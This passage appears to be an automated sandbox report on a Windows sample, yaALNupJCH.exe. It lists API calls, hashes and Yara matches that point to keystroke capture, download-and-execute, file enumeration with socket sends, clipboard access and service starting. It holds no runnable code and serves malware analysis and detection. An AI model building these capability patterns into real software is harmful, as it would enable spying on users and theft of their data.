                                                                                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00409258
                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                • String ID:
                                                                                                • API String ID: 1824512719-0
                                                                                                • Opcode ID: 5f8d9dbab85d370993fc4c4966b41904945c3605371eb1279cff70fae7b0a79d
                                                                                                • Instruction ID: 682ac26ed7e8a3fec7eea21b1f58d506290f673c60e7927747fbe341be509488
                                                                                                • Opcode Fuzzy Hash: 5f8d9dbab85d370993fc4c4966b41904945c3605371eb1279cff70fae7b0a79d
                                                                                                • Instruction Fuzzy Hash: 82B18E32900109AACB04FBA1DD96AEDB379AF04314F10417FF506B61E2EF785E49CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040A414
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A41F
                                                                                                • GetKeyboardLayout.USER32 ref: 0040A426
                                                                                                • GetKeyState.USER32(00000010), ref: 0040A430
                                                                                                • GetKeyboardState.USER32(?), ref: 0040A43D
                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A459
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                                • String ID:
                                                                                                • API String ID: 3566172867-0
                                                                                                • Opcode ID: 844ac67e9bb01e022d5e1c3247d2b7046eb1d2e1975d077ec3cb4ec24acbdb08
                                                                                                • Instruction ID: 281ffdbf1a9a39d400c3d2c64feb854b52b7ec9ef9c1b09e5e6af93a0c8d5dc5
                                                                                                • Opcode Fuzzy Hash: 844ac67e9bb01e022d5e1c3247d2b7046eb1d2e1975d077ec3cb4ec24acbdb08
                                                                                                • Instruction Fuzzy Hash: 89110C72900218FBDB109BA4ED49FDA7BBCEB4C715F000465FA04E6191D675EE54CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A5EE,00000000), ref: 0041A9A1
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A5EE,00000000), ref: 0041A9B6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9C3
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A5EE,00000000), ref: 0041A9CE
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9E0
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9E3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: f0a41ace0033e4adc6ed211f5b9a4713447c101ebbe7debfeabf45247fd2b7b8
                                                                                                • Instruction ID: 1f56653cd1b33a3082ec54d54fd8d4841359485faa7b6e76ca92d08d0c7a47ff
                                                                                                • Opcode Fuzzy Hash: f0a41ace0033e4adc6ed211f5b9a4713447c101ebbe7debfeabf45247fd2b7b8
                                                                                                • Instruction Fuzzy Hash: BFF0E9B1111225AFD2115B219C88DFF376CDF81B66B00082AF901921919B68CC85B579
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0045269C,?,00000000), ref: 00452416
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0045269C,?,00000000), ref: 0045243F
                                                                                                • GetACP.KERNEL32(?,?,0045269C,?,00000000), ref: 00452454
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 8109e71563a39a3b26d0eb2584ef597fedb24f2fc8293daa357ab739a01d4f79
                                                                                                • Instruction ID: d01d4c930f94fe8d1e613ea2bb83b6ad54fccc02e3db7858a1f0680e3809c62e
                                                                                                • Opcode Fuzzy Hash: 8109e71563a39a3b26d0eb2584ef597fedb24f2fc8293daa357ab739a01d4f79
                                                                                                • Instruction Fuzzy Hash: E521E532700200A6DB358B25DA00B9B73A6EF57B13F168467ED09D7212E7BADD45C358
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B407
                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B41B
                                                                                                • LockResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B422
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B431
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                • Instruction ID: fc30b558c4419b0a31bdf043ab49805da964fa505f7a1de0fc394f039a43b5e3
                                                                                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                • Instruction Fuzzy Hash: 98E01A36600B22EBEB211BA5AC4CD463E29F7C97637140075F90696231CB758840DAA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0040966A
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 1157919129-0
                                                                                                • Opcode ID: b6c9e42f210da4629bc958b5d5a8037a5563f119b7cf058d47e692f85f8f78a6
                                                                                                • Instruction ID: 070a9d5dece77f020f22c6d3047f7193b13bcd532efb7b5f68a00bb5efad3e6d
                                                                                                • Opcode Fuzzy Hash: b6c9e42f210da4629bc958b5d5a8037a5563f119b7cf058d47e692f85f8f78a6
                                                                                                • Instruction Fuzzy Hash: 40811C329001199ACB15EBA1DC969EEB378AF14318F10417FE506B71E2FF789E49CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045265D
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004526B8
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 004526C7
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,004449AC,00000040,?,00444ACC,00000055,00000000,?,?,00000055,00000000), ref: 0045270F
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00444A2C,00000040), ref: 0045272E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: fa1670b29e0cff1f476005e56d7a6401a52f80e4e2cf6494cd076bea83c8f255
                                                                                                • Instruction ID: 230a0f2966f322ebe53ce31d65220e852efde1a8d6b26a963b9ac082dbe1daf9
                                                                                                • Opcode Fuzzy Hash: fa1670b29e0cff1f476005e56d7a6401a52f80e4e2cf6494cd076bea83c8f255
                                                                                                • Instruction Fuzzy Hash: 4A51A471900209ABDF10DFA5DD45BBF73B8AF06702F08056BED04E7252E7B899498B69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00408811
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                • String ID:
                                                                                                • API String ID: 1771804793-0
                                                                                                • Opcode ID: 98882c3fb8c382ebf1d08c0d059c7b5ad1d191f9937145677da36107fcb1e2f7
                                                                                                • Instruction ID: f4c76a25ae066abca739e86e51e7a0462eedc1fe756a7d18505f7f1389ca0f1f
                                                                                                • Opcode Fuzzy Hash: 98882c3fb8c382ebf1d08c0d059c7b5ad1d191f9937145677da36107fcb1e2f7
                                                                                                • Instruction Fuzzy Hash: E8515172900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Users\user\Desktop\yaALNupJCH.exe$open
                                                                                                • API String ID: 2825088817-2142578241
                                                                                                • Opcode ID: 2f3c64e68da1a3c475925c5fa33f393ed330c4fefede06b1ab4b2f3cd8cb2171
                                                                                                • Instruction ID: e8f5d5918c01e45b9f58dfb5f701da15e03eec86fcc3d5a852d78a22cf403570
                                                                                                • Opcode Fuzzy Hash: 2f3c64e68da1a3c475925c5fa33f393ed330c4fefede06b1ab4b2f3cd8cb2171
                                                                                                • Instruction Fuzzy Hash: A761A071B0820156CA24FB76C8669BE77A99F81748F40093FF942772D2EE3C9905869F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                • String ID: XPG$XPG
                                                                                                • API String ID: 4113138495-1962359302
                                                                                                • Opcode ID: 5149e229ab00364da4007bffada40442c59a20ad82d668b232f60745ab4db98d
                                                                                                • Instruction ID: 30f2f091d1745287e7c5bdc4e0ba67ea9086f55c29d946c5ca09ee25448eee69
                                                                                                • Opcode Fuzzy Hash: 5149e229ab00364da4007bffada40442c59a20ad82d668b232f60745ab4db98d
                                                                                                • Instruction Fuzzy Hash: 2D2186315043415BC314F761D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CA25
                                                                                                  • Part of subcall function 004136BD: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004136CC
                                                                                                  • Part of subcall function 004136BD: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136F4
                                                                                                  • Part of subcall function 004136BD: RegCloseKey.KERNEL32(?,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                                                                                • Instruction ID: 79be2b8cdbb23de21057fc337ed2e77d7a8ad64980aeb84def733d201678bbd2
                                                                                                • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                                                                                • Instruction Fuzzy Hash: 23119DB2BC025032D918353A1D9BBBE28129757F51F9101ABF6023E3C6E9CF0A9146CF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004449B3,?,?,?,?,?,?,00000004), ref: 00451CFB
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00451D8B
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00451D99
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004449B3,00000000,00444AD3), ref: 00451E3C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 14a764fd6ed12dfdcaa65424ebdbb9bd7c0f192dfb7e073e066ce26d79732a85
                                                                                                • Instruction ID: 14b133ae5c81331acca561b47ce8062aaa11cc7e398ae8fc4233077d85e48ad0
                                                                                                • Opcode Fuzzy Hash: 14a764fd6ed12dfdcaa65424ebdbb9bd7c0f192dfb7e073e066ce26d79732a85
                                                                                                • Instruction Fuzzy Hash: 45610A71600205AAE725AB36CC46BAB73A8EF04306F14442FFD05D7292EB79ED48C768
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452058
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004520A9
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452169
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: 7f6a73b4c1a337f8cdfffcc3746213a0a2295b303bf7df5f7f28e86f06d27cc4
                                                                                                • Instruction ID: 532fc222645340eff7d03ca33bc0d43134e9c9b1347fe7fb292f935410b2db51
                                                                                                • Opcode Fuzzy Hash: 7f6a73b4c1a337f8cdfffcc3746213a0a2295b303bf7df5f7f28e86f06d27cc4
                                                                                                • Instruction Fuzzy Hash: 9661C6715006079BDB289F24CD81B7B77A8EF16306F1440BBED05C6642E7BCD989CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,0043340D,00000034,?,?,00000000), ref: 00433797
                                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004334A0,00000000,?,00000000), ref: 004337AD
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004334A0,00000000,?,00000000,0041E19F), ref: 004337BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                • Instruction ID: d57451560084938dac3e894a0bfac24fee6c04dd763756b664d54862db7b60e1
                                                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                • Instruction Fuzzy Hash: F7E09AB1208310FEFB300F21EC08F673AA4EB89F72F204A3AF651E41E4D7668901861D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2058664381-0
                                                                                                • Opcode ID: 519ef2c27197b8d96ba826a5c3e8c472a064a98dfaa986ceeee74c7c82622cfa
                                                                                                • Instruction ID: 12cbdee9a8fd4f9d33682b6f823f9a7816142bf9e60be8ebe326d1ace0c113b9
                                                                                                • Opcode Fuzzy Hash: 519ef2c27197b8d96ba826a5c3e8c472a064a98dfaa986ceeee74c7c82622cfa
                                                                                                • Instruction Fuzzy Hash: E6E08C30205320EFC2205B609C0CB8A67509F85B52F024A3ABC85AA2D0DB39CC00C6AE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                • EnumSystemLocalesW.KERNEL32(00452004,00000001,00000000,?,004449AC,?,00452631,00000000,?,?,?), ref: 00451F4E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID: 1&E
                                                                                                • API String ID: 1084509184-528507022
                                                                                                • Opcode ID: 6042bf35db955c8155168cdea4bd964db26141be6ffdfaba86cbec483356b97a
                                                                                                • Instruction ID: 7ccab57252c86bdbc2332e9d9a1a7588b25c389669ebfe4ed4bb9db7d5cf98d5
                                                                                                • Opcode Fuzzy Hash: 6042bf35db955c8155168cdea4bd964db26141be6ffdfaba86cbec483356b97a
                                                                                                • Instruction Fuzzy Hash: 911148372003059FDB189F39C8916BBB791FF80369B14442EED8687B51D775B906C744
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 00448800
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 34b462f6e5987f68bc3ca5e2a1c359985bc317571eb71942286ac193dfa3ab1f
                                                                                                • Instruction ID: 59b7edac1ee3b9a1fc61ec009b02a66a74686443aee658c776b66ba69a57392f
                                                                                                • Opcode Fuzzy Hash: 34b462f6e5987f68bc3ca5e2a1c359985bc317571eb71942286ac193dfa3ab1f
                                                                                                • Instruction Fuzzy Hash: 03F02B31A00308F7DB01AF61DC01FAE7B61DF04712F10456EFC0526262CE759D159A9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: 7fba601ea237378da0a977c6d17b643b08c3bbb2c23d121bede84fc2343487d0
                                                                                                • Instruction ID: 4fe845b936be1eb8fdcbb114edd566682b4e2bd66d9e4785f410dba98d0612dd
